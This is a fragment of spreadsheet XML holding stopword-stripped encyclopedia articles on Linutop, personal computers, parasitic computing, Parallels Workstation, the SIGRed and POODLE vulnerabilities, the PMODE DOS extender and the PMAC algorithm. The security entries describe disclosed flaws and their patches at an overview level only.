gedit, samba internet kiosk full screen, toolbar management, white/blacklist management. display kiosk user define playlist loop urls, photos, video configuration panel allows user "lock" configuration, configure graphics. size 2900 micro flash memory raspberry compatibility zero, zero demo version linutop available free also available noobs format. linutop linutop designed manage network connected digital signage screens allows centralized management http interface. each screens needs player (pc, raspberry linutop mini pc), running linutop kiosk software, connected server order update display content automatically. linutop server solution available versions: saas "cloud") server: accessible internet. private (local) server: works local network. this solution often used corporations intranet. offers maximum security. references linutop introduction external links linutop wiki linutop video a603 mini linutop mini review trustedreviews linutops fanless linux review slashgear tiny linutop computer technabob linutop fanless mini linux desktop ubergizmo sources official website linutop blog also fit-pc eeepc zonbu koolu raspberry ubuntu (operating system) digital signage interactive kiosk</t>
  </si>
  <si>
    <t>Personal computer</t>
  </si>
  <si>
    <t>personal computer (pc) multi-purpose microcomputer whose size, capabilities, price make feasible individual use. personal computers intended operated directly user, rather computer expert technician. unlike large, costly minicomputers mainframes, time-sharing many people time used personal computers. primarily late 1970s 1980s, term home computer also used. institutional corporate computer owners 1960s write programs useful work machines. while personal computer users develop applications, usually systems commercial software, free-of-charge software ("freeware"), often proprietary, free open-source software, provided "ready-to-run", binary, form. software personal computers typically developed distributed independently hardware operating system manufacturers. many personal computer users longer need write programs make personal computer, although end-user programming still feasible. this contrasts mobile systems, software often available manufacturer-supported channel, end-user program development discouraged lack support manufacturer.since early 1990s, microsoft operating systems intel hardware dominated much personal computer market, first ms-dos microsoft windows. alternatives microsoft's windows operating systems occupy minority share industry. these include apple's macos free open-source unix-like operating systems, linux. advent personal computers concurrent digital revolution significantly affected lives people countries. terminology term "pc" initialism "personal computer". while personal computer incorporated designation model name, term originally described personal computers brand. contexts, "pc" used contrast "mac", apple macintosh computer. since none apple products mainframes time-sharing systems, "personal computers" "pc" (brand) computers. 1995, segment growing popularity reported "for many newcomers stands pain confusion". history "brain" [computer] come level common people] help income-tax book-keeping calculations. speculation sign far. history computing, early experimental machines could operated single attendant. example, eniac became operational 1946 could single, albeit highly trained, person. this mode pre-dated batch programming, time-sharing modes multiple users connected terminals mainframe computers. computers intended laboratory, instrumentation, engineering purposes built, could operated person interactive fashion. examples include systems bendix lgp-30 1956, soviet series computers developed 1965 1969. early 1970s, people academic research institutions opportunity single-person computer system interactive mode extended durations, although systems would still expensive owned single person. personal computer made possible major advances semiconductor technology. 1959, silicon integrated circuit (ic) chip developed robert noyce fairchild semiconductor, metal-oxide-semiconductor (mos) transistor developed mohamed atalla dawon kahng bell labs. integrated circuit commercialized 1964, silicon-gate integrated circuit developed federico faggin fairchild 1968. faggin later used silicon-gate technology develop first single-chip microprocessor, intel 4004, 1971. first microcomputers, based microprocessors, developed early 1970s. widespread commercial availability microprocessors, mid-1970s onwards, made computers cheap enough small businesses individuals own. later called mother demos, researcher douglas engelbart 1968 gave preview features would later become staples personal computers: e-mail, hypertext, word processing, video conferencing, mouse. demonstration required technical support staff mainframe time-sharing computer costly individual business time. early personal computers‍—‌generally called microcomputers‍—‌were often sold form limited volumes, interest mostly hobbyists technicians. minimal programming done toggle switches enter instructions, output provided front panel lamps. practical required adding peripherals keyboards, computer displays, disk drives, printers. micral earliest commercial, non-kit microcomputer based microprocessor, intel 8008. built starting 1972, hundred units sold. this preceded datapoint 2200 1970, intel 8008 commissioned, though accepted use. design implemented datapoint 2200 became basis architecture used original descendants.in 1973, gatos scientific center developed portable computer prototype called scamp (special computer machine portable) based palm processor philips compact cassette drive, small crt, full function keyboard. scamp emulated 1130 minicomputer order apl/1130. 1973, generally available mainframe computers, desktop sized microcomputers wang 2200 9800 offered basic. because scamp first emulate apl/1130 performance portable, single user computer, magazine 1983 designated scamp "revolutionary concept" "the world's first personal computer". this seminal, single user portable computer resides smithsonian institution, washington, d.c.. successful demonstrations 1973 scamp prototype 5100 portable microcomputer launched 1975 ability programmed basic engineers, analysts, statisticians, business problem-solvers. late 1960s machine would nearly large desks would weighed half ton.another desktop portable machine, mcm/70, demonstrated 1973 shipped 1974. used intel 8008 processor. seminal step personal computing 1973 xerox alto, developed xerox's palo alto research center (parc). graphical user interface (gui) later served inspiration apple's macintosh, microsoft's windows operating system. alto demonstration project, commercialized, parts expensive affordable.also 1973 hewlett packard introduced fully basic programmable microcomputers entirely desk, including keyboard, small one-line display, printer. wang 2200 microcomputer 1973 full-size cathode tube (crt) cassette tape storage. these generally expensive specialized computers sold business scientific uses. 1974 introduction considered many first true "personal computer", altair 8800 created micro instrumentation telemetry systems (mits). based 8-bit intel 8080 microprocessor, altair widely recognized spark ignited microcomputer revolution first commercially successful personal computer. computer designed altair become facto standard form s-100 bus, first programming language machine microsoft's founding product, altair basic.in 1976, steve jobs steve wozniak sold apple computer circuit board, fully prepared contained chips. apple computer differed kit-style hobby computers era. request paul terrell, owner byte shop, jobs wozniak given first purchase order, apple computers, computers assembled tested computer. terrell wanted computers sell wide range users, experienced electronics hobbyists soldering skills assemble computer kit. apple delivered still technically computer, power supply, case, keyboard delivered byte shop. first successfully mass-marketed personal computer announced commodore revealed january 1977. however, back-ordered available later year. three months later (april), apple (usually referred "apple") announced first units shipped june 1977, trs-80 tandy corporation tandy radio shack following august 1977, sold 100,000 units lifetime. together, machines referred "1977 trinity". mass-market, ready-assembled computers arrived, allowed wider range people computers, focusing software applications less development processor hardware. 1977 heath company introduced personal computer kits known heathkits, starting heathkit followed heathkit late 1979. with purchase heathkit would obtain chassis card assemble yourself, additional hardware h8-1 memory board contained could also purchased order software. heathkit model released 1978 first 16-bit personal computers; however, high retail cost $1,295 discontinued 1982. during early 1980s, home computers developed household use, software personal productivity, programming games. they typically could used television already home computer display, low-detail blocky graphics limited color range, text characters wide characters tall. sinclair research, company, produced series‍—‌the zx80 (1980), zx81 (1981), spectrum; latter introduced 1982, totaled million unit sold. following came commodore totaled million units sold amstrad series (464–6128). year, pc-98 introduced, popular personal computer sold million units. another famous personal computer, revolutionary amiga 1000, unveiled commodore july 1985. amiga 1000 featured multitasking, windowing operating system, color graphics 4096-color palette, stereo sound, motorola 68000 cpu, ram, 3.5-inch disk drive, us$1,295.ibm's first introduced august 1981 setting became mass market standard architecture.in 1982 "the computer" named machine year time magazine. somewhat larger expensive systems aimed office small business use. these often featured 80-column text displays might graphics sound capabilities. these microprocessor-based systems still less costly time-shared mainframes minicomputers. workstations characterized high-performance processors graphics displays, large-capacity local disk storage, networking capability, running multitasking operating system. eventually, influence personal computer market, personal computers home computers lost technical distinction. business computers acquired color graphics capability sound, home computers game systems users used processors operating systems office workers. mass-market computers graphics capabilities memory comparable dedicated workstations years before. even local area networking, originally allow business computers share expensive mass storage peripherals, became standard feature personal computers used home. increasingly important uses personal computers relied ability computer communicate computer systems, allowing interchange information. experimental public access shared mainframe computer system demonstrated early 1973 community memory project, bulletin board systems online service providers became commonly available 1978. commercial internet service providers emerged late 1980s, giving public access rapidly growing network. 1991, world wide made available public use. combination powerful personal computers high-resolution graphics sound, infrastructure provided internet, standardization access methods browsers, established foundation significant fraction modern life, time tables unlimited distribution free videos online user-edited encyclopedias. types stationary workstation workstation high-end personal computer designed technical, mathematical, scientific applications. intended primarily used person time, commonly connected local area network multi-user operating systems. workstations used tasks computer-aided design, drafting modeling, computation-intensive scientific engineering calculations, image processing, architectural modeling, computer graphics animation motion picture visual effects. desktop computer before widespread pcs, computer could desk remarkably small, leading "desktop" nomenclature. more recently, phrase usually indicates particular style computer case. desktop computers come variety styles ranging large vertical tower cases small models tucked behind rest directly beneath (and support) monitors. while term "desktop" often refers computer vertically aligned computer tower case, varieties often rest ground underneath desks. despite seeming contradiction, term "desktop" typically refer vertical tower cases well horizontally aligned models designed literally rest desks therefore appropriate "desktop" term, although types qualify "desktop" label practical situations aside certain physical arrangement differences. both styles computer cases hold systems hardware components motherboard, processor chip, internal operating parts. desktop computers external monitor display screen external keyboard, plugged ports back computer case. desktop computers popular home business computing applications leave space desk multiple monitors. gaming computer desktop computer generally comprises high-performance video card, processor ram, improve speed responsiveness demanding video games.an all-in-one computer (also known single-unit pcs) desktop computer combines monitor processor within single unit. separate keyboard mouse standard input devices, monitors including touchscreen capability. processor working components typically reduced size relative standard desktops, located behind monitor, configured similarly laptops. nettop computer introduced intel february 2008, characterized cost lean functionality. these intended used internet connection browsers internet applications. home theater (htpc) combines functions personal computer digital video recorder. connected appropriately sized computer display, often used digital photo viewer, music video player, receiver, digital video recorder. htpcs also referred media center systems media servers. goal combine many components home theater setup box. htpcs also connect services providing on-demand movies shows. htpcs purchased pre-configured required hardware software needed television programming assembled components. keyboard computers computers inside keyboards. examples include commodore msx, amstrad cpc, atari spectrum. portable potential utility portable computers apparent early alan described dynabook 1972, hardware developed. xerox notetaker produced small experimental batch around 1978. 1975, 5100 could transport case, making portable computer, weighed pounds. before introduction portable computers consisting processor, display, disk drives keyboard, suit-case style portable housing, allowed users bring computer home office take notes classroom. examples include osborne kaypro; commodore sx-64. these machines ac-powered included small display screen. form factor intended allow systems taken board airplane carry-on baggage, though high power demand meant could used flight. integrated display made relatively heavy package, machines portable contemporary desktop equals. some models standard optional connections drive external video monitor, allowing larger screen video projectors. pc-compatible suitcase format computers became available soon introduction compaq portable leading example type. later models included hard drive give roughly equivalent performance contemporary desktop computers. development thin plasma display screens permitted somewhat smaller form factor, called "lunchbox" computer. screen formed side enclosure, detachable keyboard half-height floppy disk drives, mounted facing ends computer. some variations included battery, allowing operation away outlets.notebook computers trs-80 model epson hx-20 roughly plan dimensions sheet typing paper (ansi a4). these machines keyboard slightly reduced dimensions compared desktop system, fixed display screen coplanar keyboard. these displays usually small, lines text, sometimes columns line length. however, machines could operate extended times disposable rechargeable batteries. although usually include internal disk drives, form factor often included modem telephone communication often provisions external cassette disk storage. later, clam-shell format laptop computers similar small plan dimensions also called "notebooks". laptop laptop computer designed portability "clamshell" design, keyboard computer components panel, hinged second panel containing flat display screen. closing laptop protects screen keyboard transportation. laptops generally rechargeable battery, enhancing portability. save power, weight space, laptop graphics chips many cases integrated chipset system ram, resulting reduced graphics performance compared desktop machines, typically graphics card installed. reason, desktop computers usually preferred laptops gaming purposes. unlike desktop computers, minor internal upgrades (such memory hard disk drive) feasible owing limited space power available. laptops input output ports desktops, connecting external displays, mice, cameras, storage devices keyboards. laptops also little expensive compared desktops, miniaturized components laptops expensive. desktop replacement computer portable computer provides full capabilities desktop computer. such computers currently large laptops. this class computers usually includes powerful components larger display generally found smaller portable computers, limited battery capacity battery. netbooks, also called mini notebooks subnotebooks, subgroup laptops suited general computing tasks accessing web-based applications. initially, primary defining characteristic netbooks lack optical disc drive, smaller size, lower performance full-size laptops. mid-2009 netbooks offered users "free charge", extended service contract purchase cellular data plan. ultrabooks chromebooks since filled left netbooks. unlike generic netbook name, ultrabook chromebook technically specifications intel google respectively. tablet tablet uses touchscreen display, controlled using either stylus finger. some tablets "hybrid" "convertible" design, offering keyboard either removed attachment, screen rotated folded directly keyboard. some tablets desktop-pc operating system windows linux, operating system designed primarily tablets. many tablet computers ports, keyboard mouse connected. smartphone smartphones often similar tablet computers, difference smartphones always cellular integration. they generally smaller tablets, slate form factor. ultra-mobile ultra-mobile (ump) small tablet computer. developed microsoft, intel samsung, among others. current umpcs typically feature windows windows vista, windows linux operating system, low-voltage intel atom c7-m processors. pocket pocket hardware specification handheld-sized computer (personal digital assistant, pda) runs microsoft windows mobile operating system. capability alternative operating system like netbsd linux. pocket many capabilities desktop pcs. numerous applications available handhelds adhering microsoft pocket specification, many freeware. microsoft-compliant pocket also used many add-ons like receivers, barcode readers, rfid readers cameras. 2007, release windows mobile microsoft dropped name pocket favor naming scheme: devices without integrated phone called windows mobile classic instead pocket devices integrated phone touch screen called windows mobile professional. palmtop handheld computers palmtop miniature pocket-sized computers running first came late 1980s, typically clamshell form factor keyboard. non-x86 based devices often called palmtop computers, examples psion series later years hardware specification called handheld later released microsoft windows operating system. hardware computer hardware comprehensive term physical tangible parts computer, distinguished data contains operates software provides instructions hardware accomplish tasks. some sub-systems personal computer contain processors fixed program, firmware, keyboard controller. firmware usually changed user personal computer. most 2010s-era computers require users plug power supply, monitor, cables. typical desktop computer consists computer case "tower"), metal chassis holds power supply, motherboard, storage device hard disk drive solid-state drive, often optical disc drive. most towers empty space users additional components. external devices computer monitor visual display unit, keyboard, pointing device (mouse) usually found personal computer. motherboard connects processor, memory peripheral devices together. ram, graphics card processor cases mounted directly onto motherboard. central processing unit (microprocessor chip) plugs socket, modules plug corresponding sockets. some motherboards video display adapter, sound peripherals integrated onto motherboard, others expansion slots graphics cards, network cards, devices. graphics card sound card employ break keep analog parts away electromagnetic radiation inside computer case. disk drives, provide mass storage, connected motherboard cable, power supply another cable. usually, disk drives mounted case motherboard; expansion chassis also made additional disk storage. large amounts data, tape drive used extra hard disks together external case. keyboard mouse external devices plugged computer connectors panel back computer case. monitor also connected input/output (i/o) panel, either onboard port motherboard, port graphics card. capabilities personal computer's hardware sometimes extended addition expansion cards connected expansion bus. standard peripheral buses often used adding expansion cards personal computers include pci, express (pcie), high-speed dedicated graphics adapters, found older computers). most modern personal computers multiple physical express expansion slots, slots well. peripheral device connected computer provide communication (such input output) auxiliary functions (such additional storage)". peripherals generally connect computer ports inputs located panel. flash drives provide portable storage using flash memory allows users access files stored drive computer. memory cards also provide portable storage users, commonly used electronics mobile phones digital cameras, information stored cards accessed using memory card reader transfer data devices. webcams, either built computer hardware connected video cameras records video real time either saved computer streamed somewhere else internet. game controllers plugged used input device video games alternative using keyboard mouse. headphones speakers connected auxiliary port (found panel) allow users listen audio accessed computer; however, speakers also require additional power source operate. microphones connected audio input port panel allow computer convert sound electrical signal used transmitted computer. software computer software kind computer program, procedure, documentation performs task computer system. term includes application software word processors perform productive tasks users, system software operating systems interface computer hardware provide necessary services application software, middleware controls co-ordinates distributed systems. software applications common word processing, internet browsing, internet faxing, e-mail digital messaging, multimedia playback, playing computer game, computer programming. user significant knowledge operating environment application programs, necessarily interested programming even able write programs computer. therefore, software written primarily personal computers tends designed simplicity use, "user-friendliness" mind. however, software industry continuously provide wide range products personal computers, targeted expert non-expert user. operating system operating system (os) manages computer resources provides programmers interface used access resources. operating system processes system data user input, responds allocating managing tasks internal system resources service users programs system. operating system performs basic tasks controlling allocating memory, prioritizing system requests, controlling input output devices, facilitating computer networking, managing files. common contemporary desktop operating systems microsoft windows, macos, linux, solaris freebsd. windows, macos, linux server personal variants. with exception microsoft windows, designs inspired directly inherited unix operating system. early personal computers used operating systems supported command line interaction, using alphanumeric display keyboard. user remember large range commands example, open file editing move text place another. starting early 1960s, advantages graphical user interface began explored, widespread adoption required lower-cost graphical display equipment. 1984, mass-market computer systems using graphical user interfaces available; turn 21st century, text-mode operating systems longer significant fraction personal computer market. applications generally, computer user uses application software carry specific task. system software supports applications provides common services memory management, network connectivity device drivers, used applications directly interest user. simplified analogy world hardware would relationship electric light bulb application) electric power generation plant system): power plant merely generates electricity, real harnessed application like electric light performs service benefits user. typical examples software applications word processors, spreadsheets, media players. multiple applications bundled together package sometimes referred application suite. microsoft office libreoffice, bundle together word processor, spreadsheet, several discrete applications, typical examples. separate applications suite usually user interface commonality making easier user learn application. often, capability interact ways beneficial user; example, spreadsheet might able embedded word processor document even though created separate spreadsheet application. end-user development tailors systems meet user's specific needs. user-written software include spreadsheet templates, word processor macros, scientific simulations, graphics animation scripts; even email filters kind user software. users create software often overlook important gaming gaming popular among high-end market. according april 2018 market analysis done newzoo, gaming fallen behind console mobile gaming terms market share sitting share entire market. market gaming still continues grow expected generate $32.3 billion revenue year 2021. gaming forefront competitive gaming, known esports, games overwatch counter-strike: global offensive leading industry suspected surpass trillion dollars revenue 2019. sales market share 2001, million personal computers shipped comparison 48,000 1977. more million personal computers 2002 billion personal computers sold worldwide mid-1970s time. latter figure, professional work related, rest sold personal home use. about 81.5% personal computers shipped desktop computers, 16.4% laptops 2.1% servers. united states received 38.8% (394 million) computers shipped, europe 11.7% gone asia-pacific region, fastest-growing market 2002. second billion expected sold 2008. almost half households western europe personal computer computer could found homes united kingdom, compared 1985.the global personal computer shipments 350.9 million units 2010, 308.3 million units 2009 302.2 million units 2008. shipments million units year 2007, according isuppli, 11.2% million 2006. 2004, global shipments million units, 11.6% increase 2003. 2003, 152.6 million computers shipped, estimated value $175 billion. 2002, 136.7 million shipped, estimated value $175 billion. 2000, 140.2 million personal computers shipped, estimated value $226 billion. worldwide shipments personal computers surpassed 100-million mark 1999, growing 113.5 million units 93.3 million units 1998. 1999, asia 14.1 million units shipped.as june 2008, number personal computers worldwide billion, another billion expected reached 2014. mature markets like united states, western europe japan accounted worldwide installed pcs. emerging markets expected double installed 2012 take second billion pcs. about million computers (16% existing installed base) expected replaced million dumped landfill 2008. whole installed base grew annually.based international data corporation (idc) data 2011, first time china surpassed shipments 18.5 million 17.7 million respectively. this trend reflects rising emerging markets well relative stagnation mature regions. developed world, vendor tradition keep adding functions maintain high prices personal computers. however, since introduction laptop child foundation low-cost xo-1 laptop, computing industry started pursue price too. although introduced year earlier, million netbooks sold 2008. besides regular computer manufacturers, companies making especially rugged versions computers sprung offering alternatives people operating machines extreme weather environments.in 2011, deloitte consulting firm predicted that, smartphones tablet computers computing devices would surpass sales happened since 2012). 2013, worldwide sales begun fall many consumers moved tablets smartphones. sales 90.3 million units fourth quarter 2012 represented 4.9% decline sales fourth quarter 2011. global sales fell sharply first quarter 2013, according data. year-over-year decline largest record since firm began tracking 1994, double analysts expecting. decline 2013 shipments marked fifth straight quarter falling sales. "this horrific news pcs," remarked analyst. "it's mobile computing now. definitely reached tipping point." data gartner showed similar decline time period. china's lenovo group bucked general trend strong sales first-time buyers developing world allowed company's sales stay flat overall. windows designed look similar tablet/smartphone software, cited contributing factor decline sales. "unfortunately, seems clear windows launch provide positive boost market, appears slowed market," said vice president o’donnell.in august 2013, credit suisse published research findings attributed around operating profit share industry microsoft (operating system) intel (semiconductors). according idc, 2013 shipments dropped 9.8% greatest drop-ever line consumers trends mobile devices.in second quarter 2018, sales grew first time since first quarter 2012. according research firm gartner, growth mainly came business market consumer market experienced decline.in 2020, result covid-19 pandemic people working home learning remotely, sales grew 26.1% compared pervious years according idc. according canalys, 2020 highest growth rate market since 2011. average selling price selling prices personal computers steadily declined lower costs production manufacture, capabilities computers increased. 1975, altair sold around us$400, required customers solder components circuit boards; peripherals required interact system alphanumeric form instead blinking lights would another $2,000, resultant system hobbyists.at introduction 1981, us$1,795 price osborne competitor kaypro considered attractive price point; systems text-only displays floppy disks storage. 1982, michael dell observed personal computer system selling retail us$3,000 made components cost dealer $600; typical gross margin computer unit around $1,000. total value personal computer purchases 1983 billion, comparable total sales food. late 1998, average selling price personal computer systems united states dropped $1,000.for microsoft windows systems, average selling price (asp) showed decline 2008/2009, possibly low-cost netbooks, drawing $569 desktop computers $689 laptops u.s. retail august 2008. 2009, fallen $533 desktops $602 notebooks january $540 february. according research firm npd, average selling price windows portable fallen $659 october 2008 $519 october 2009. environmental impact external costs environmental impact fully included selling price personal computers.personal computers become large contributor million tons discarded electronic waste generated annually, according united nations environment programme. address electronic waste issue affecting developing countries environment, extended producer responsibility (epr) acts implemented various countries states. absence comprehensive national legislation regulation export import electronic waste, silicon valley toxics coalition (basel action network) teamed electronic recyclers canada create e-steward program orderly disposal electronic waste. some organizations oppose regulation, claim manufacturers naturally move toward reduced material energy use. also list home computers public computer portable computer desktop replacement computer quiet pocket market share personal computer vendors personal computer museum enthusiast computer references further reading accidental empires: boys silicon valley make millions, battle foreign competition, still can't date, robert cringely, addison-wesley publishing, (1992), isbn 0-201-57032-7 magazine, vol. november 1983, ‘'scamp: missing link pc's past?‘’ external links stuff works pages: dissecting work upgrade your computer build computer global archive product data-sheets workstations</t>
  </si>
  <si>
    <t>Parasitic computing</t>
  </si>
  <si>
    <t>parasitic computing programming technique program normal authorized interactions another program manages program perform computations complex nature. sense, security exploit program implementing parasitic computing authority consume resources made available program. first proposed albert-laszlo barabasi, vincent freeh, hawoong jeong brockman university notre dame, indiana, usa, 2001. example given original paper computers communicating internet, disguise standard communications session. first computer attempting solve large extremely difficult 3-sat problem; decomposed original 3-sat problem considerable number smaller problems. each smaller problems encoded relation checksum packet whether checksum accurate also answer smaller problem. packet/checksum sent another computer. this computer will, part receiving packet deciding whether valid well-formed, create checksum packet whether identical provided checksum. checksum invalid, request packet original computer. original computer knows answer smaller problem based second computer's response, transmit fresh packet embodying different sub-problem. eventually, sub-problems answered final answer easily calculated. example based exploit transmission control protocol (tcp), used internet connections, end, target computer(s) unaware performed computation benefit computer, even done anything besides normal tcp/ip session. proof-of-concept obviously extremely inefficient amount computation necessary merely send packets first place easily exceeds computations leeched program; 3-sat problem would solved much quickly analyzed locally. addition, practice packets would probably retransmitted occasionally real checksum errors network problems occur. however, parasitic computing level checksums demonstration concept. authors suggest moves application stack, might come point computational gain parasite perhaps could break interesting problems queries complex cryptographic protocols using public keys. gain, could theory number control nodes many hosts internet form distributed computing network completely unawares. students university applied sciences, bern, switzerland, extended concept programmable virtual machine 2002. parasitic bitcoin mining 2011, group malware programs noticed security software vendors, utilized high performance graphics processing units (gpus) bitcoin mining, chain computationally intensive tasks generate cryptocurrency units. these programs invaded systems executed like malware, rather exploiting underlying protocols. powerful gpus personal computers originally created mainly games, interfaces like cuda opencl, became usable general computing tasks, surpassing performance central processing unit (cpu) multiple times. until then, parasitic computing lacked powerful computing resources results easily convert cash criminals. january 2014, bitcoin mining malware distributed java exploit compromised ads, displayed yahoo website. 2013, bitcoin mining malware installed adware alongside downloads, pointing functionality lengthy eula texts. malware including bitcoin mining functionality also secretly downloaded activated adware bundled regular software downloads, distributed related companies israel ukraine.bitcoin mining personal computers infected malware challenged dedicated hardware, fpga asic platforms, efficient terms power consumption thus lower costs theft computing resources. also denial service attack references "parasitic computing", barabasi al., nature, 412: 894-897 (2001).</t>
  </si>
  <si>
    <t>Parallels Workstation</t>
  </si>
  <si>
    <t>parallels workstation first commercial software product released parallels, inc., developer desktop server virtualization software. workstation software consists virtual machine suite intel x86-compatible computers (running microsoft windows linux) (for version, parallels desktop mac) allows simultaneous creation execution multiple virtual computers. product distributed download package. parallels workstation discontinued windows linux 2013. implementation like virtualization software, parallels workstation uses hypervisor technology, thin software layer primary host computer. hypervisor directly controls host machine's hardware resources provides interface virtual machine monitors primary this allows virtualization software reduce overhead. parallels workstation's hypervisor also supports hardware virtualization technologies like intel vt-x amd-v. features parallels workstation hardware emulation virtualization software, virtual machine engine enables virtual machine work processor, ram, floppy drive, drive, devices, hard disk everything physical computer contains. parallels workstation virtualizes devices within virtual environment, including video adapter, network adapter, hard disk adapters. also provides pass-through drivers parallel port devices. because guest virtual machines hardware drivers irrespective actual hardware host computer, virtual machine instances highly portable computers. example, running virtual machine stopped, copied another physical computer, restarted. parallels workstation able virtualize full standard hardware, including: 64-bit processor aes-ni instructions. generic motherboard compatible intel p965 chipset. ram. svga video cards vesa support vram. 1.44 floppy drive, mapped physical drive image file. four devices. this includes virtual hard drives range size cd/dvd-rom drives. devices mapped physical drive image file. sata devices including hard disks cd/dvd drives. four serial ports mapped real port, pipe output file. three bi-directional parallel ports, mapped real port, real printer output file. ethernet virtual network card compatible realtek rtl8029(as) full ipv6 support. controller. ac'97 compatible sound card. 104-key windows enhanced keyboard ps/2 wheel mouse. officially supported guest operating systems windows windows vista, windows linux distributions: debian 6.0, fedora opensuse 11.1, rhel sled sp1, ubuntu 10.10, 11.04 11.10 system requirements last version parallels workstation (version requires: cpu: minimum 1.66 ghz, x86-64. 64-bit guest operating systems, processor supporting intel vt-x hardware virtualization technology recommended. ram: least required, recommended. also parallels desktop comparison platform virtualization software hypervisor virtual appliance virtual machine virtualization virtual disk image references external links official website</t>
  </si>
  <si>
    <t>SIGRed</t>
  </si>
  <si>
    <t>sigred (cve-2020-1350) security vulnerability discovered microsoft's domain name system (dns) implementation windows server versions 2003 2019. exploit vulnerability, unauthenticated attacker sends malicious requests windows server. exploited, vulnerability could allow attacker arbitrary code domain controller context local system account. microsoft's advisory issue, vulnerability classified 'wormable' given cvss base score 10.0.it subject department homeland security emergency directive, instructing government agencies deploy patches mitigations hours.the vulnerability discovered check point software technologies publicly disclosed july 2020. references</t>
  </si>
  <si>
    <t>POODLE</t>
  </si>
  <si>
    <t>poodle (which stands "padding oracle downgraded legacy encryption") security vulnerability takes advantage fallback 3.0. attackers successfully exploit vulnerability, average, need make requests reveal byte encrypted messages. bodo möller, thai duong krzysztof kotowicz google security team discovered vulnerability; disclosed vulnerability publicly october 2014 (despite paper dated "september 2014" december 2014 variation poodle vulnerability affected announced.the cve-id associated original poodle attack cve-2014-3566. networks filed cve-2014-8730 well, poodle attack section below. prevention mitigate poodle attack, approach completely disable client side server side. however, clients servers support above. thus, authors paper poodle attacks also encourage browser server implementation tls_fallback_scsv, make downgrade attacks impossible.another mitigation implement "anti-poodle record splitting". splits records several parts ensures none attacked. however problem splitting that, though valid according specification, also cause compatibility issues problems server-side implementations.a full list browser versions levels vulnerability different attacks (including poodle) found article transport layer security. opera implemented mitigation addition tls_fallback_scsv.google's chrome browser servers already supported tls_fallback_scsv. google stated october 2014 planning remove support products completely within months. fallback disabled chrome released november 2014. disabled default chrome released january 2015.mozilla disabled firefox 31.3, released december 2014, added support tls_fallback_scsv firefox 35.microsoft published security advisory explain disable internet explorer windows october 2014, microsoft released disables internet explorer windows vista server 2003 announced plan disable default products services within months. microsoft disabled fallback internet explorer protect mode sites february 2015, sites april 2015.apple's safari 10.8, later) mitigated poodle removing support protocols 3.0, however, left also completely broken attacks 3.0.. poodle completely mitigated 10.11 capitan 2015) (2015). prevent poodle attack, services dropped support 3.0. examples include cloudflare wikimedia.network security services version 3.17.1 (released october 2014) 3.16.2.3 (released october 2014) introduced support tls_fallback_scsv, disable default april 2015. openssl versions 1.0.1j, 1.0.0o 0.9.8zc, released october 2014, introduced support tls_fallback_scsv. libressl version 2.1.1, released october 2014, disabled default. poodle attack variant original poodle attack announced december 2014. this attack exploits implementation flaws encryption mode protocols. even though specifications require servers check padding, implementations fail validate properly, makes servers vulnerable poodle even disable 3.0. pulse showed "about servers vulnerable poodle attack tls" vulnerability announced. cve-id networks' implementation cve-2014-8730. entry nist's states cve-id used networks' implementation tls, vendors whose products failure validate padding mistake implementations like networks cisco systems need issue cve-ids implementation errors flaw protocol implementation. poodle attack found easier initiate initial poodle attack ssl. there need downgrade clients 3.0, meaning fewer steps needed execute successful attack. references external links this poodle bites: exploiting thessl fallback original publication poodle 1076983 (poodle) padding oracle attack mozilla bugzilla what poodle attack? acunetix article explaining poodle attack algorithm</t>
  </si>
  <si>
    <t>PMODE</t>
  </si>
  <si>
    <t>pmode extender used several compatible applications late 1990s. created thomas "tran" pytel, first version became publicly available 1994. original pmode written used programs written assembler, specifically using borland's tasm. later expanded drop-in replacement dos/4gw name pmode/w. pmode released source code included distribution archive, restrictions could sold profit, used kernel extender sold profit. older releases also requested original authors credited product. originally source code pmode/w made available public, although extender could used without restriction free software, request authors credited product. commercial shareware releases using pmode/w required license purchased. cost time pmode/w v1.33's release (1996) $500, although university students could purchase license discounted price us$100. 2002, pmode/w freely used commercial software, provided software extender. features like extenders, pmode used creation 32-bit applications protected mode 386+ opposed real mode, native execution mode operating system, mode operation supported older processors (e.g. 8086). particular, facilitates straightforward access memory (1024^2 bytes), cannot addressed real mode without special hardware, expanded memory boards. 80286 later processors line enabled, segment:offset addresses allow maximum address 1114095 (65536*16+65520, segments each, plus additional segment less bytes paragraph segmented memory works beyond first megabyte) specified real mode; extra space known hma, high memory area.) major difference pmode popular extenders small footprint, making feasible embed whole pmode dos-extended executable, increasing size approximately (binary) kilobytes, executable compression supported reduction storage footprint (but run-time memory requirement). pmode therefore often appropriate size issue (which usually computer systems), also advantage eliminating external dependency separate(*) extender (the presence certainly cannot taken granted instance dos-based "rescue disk" environments). (most extenders, dos4g/w, require small real mode program (called stub) attached beginning protected mode executable; stub would locate load external extender executable, dos4gw.exe). pmode implements subset protected mode interface (dpmi) specification version 0.9, certain extensions part dpmi. when dpmi host already loaded time pmode dos-extended executable run, pmode plays somewhat passive role, generally passing dpmi requests original provider. however, unlike extenders, pmode require presence memory manager, although compatible (such himem.sys) vcpi (provided expanded memory managers, like emm386.exe qemm), make services available. dpmi compatibility allows many pmode programs windows loaded, although windows nt-based series windows (such vista), compatibility features highly developed 3.x/9x-series (including windows millennium). incomplete dpmi implementation lack support virtual memory (demand paging, swapping, etc.) reasons pmode suitable applications. pmode entirely written assembly language, early versions directly usable programs written high level languages (including price pmode/w deterrent some, although extenders time commanded comparable higher price (such phar extender). role pmode sample code illustrating practical application advanced, widely available, under-used features documented intel 80386 manuals also underestimated, since many developers, outweighed significance pmode dos-extender. derived versions pmode/w version pmode watcom c/c++ compilers. developed charles "daredevil" scheffold thomas pytel. footprint final executable file slightly larger original pmode added functionality, still less kilobytes according documentation. pmode/dj extender derived pmode 3.07 matthias grimrath djgpp compilers. pmode/dj also used free pascal. applications using pmode pmode originally designed used demoscene demos, area application became extremely popular performance compactness. these features pmode also made relevant developers games embedded systems. pmode/w four extenders included open watcom compiler distribution. pmode/w also default extender used pascal. external links original distribution package pmode 3.07 filegate.net charles scheffold's pmode/w page pmode/w information pascal documentation djgpp part briefly lists pros cons pmode/dj compared cwsdpmi.</t>
  </si>
  <si>
    <t>PMAC (cryptography)</t>
  </si>
  <si>
    <t>pmac, stands parallelizable mac, message authentication code algorithm. created phillip rogaway. pmac method taking block cipher creating efficient message authentication code reducible security underlying block cipher. pmac similar functionality omac algorithm. patents pmac longer patented used royalty-free. originally patented phillip rogaway, since abandoned patent filings. references external links phil rogaway's page pmac changhoon lee, jongsung kim, jaechul sung, seokhie hong, sangjin lee. "forgery recovery attacks pmac mitchell's tmac variant", 2006. (ps) rust implementation</t>
  </si>
  <si>
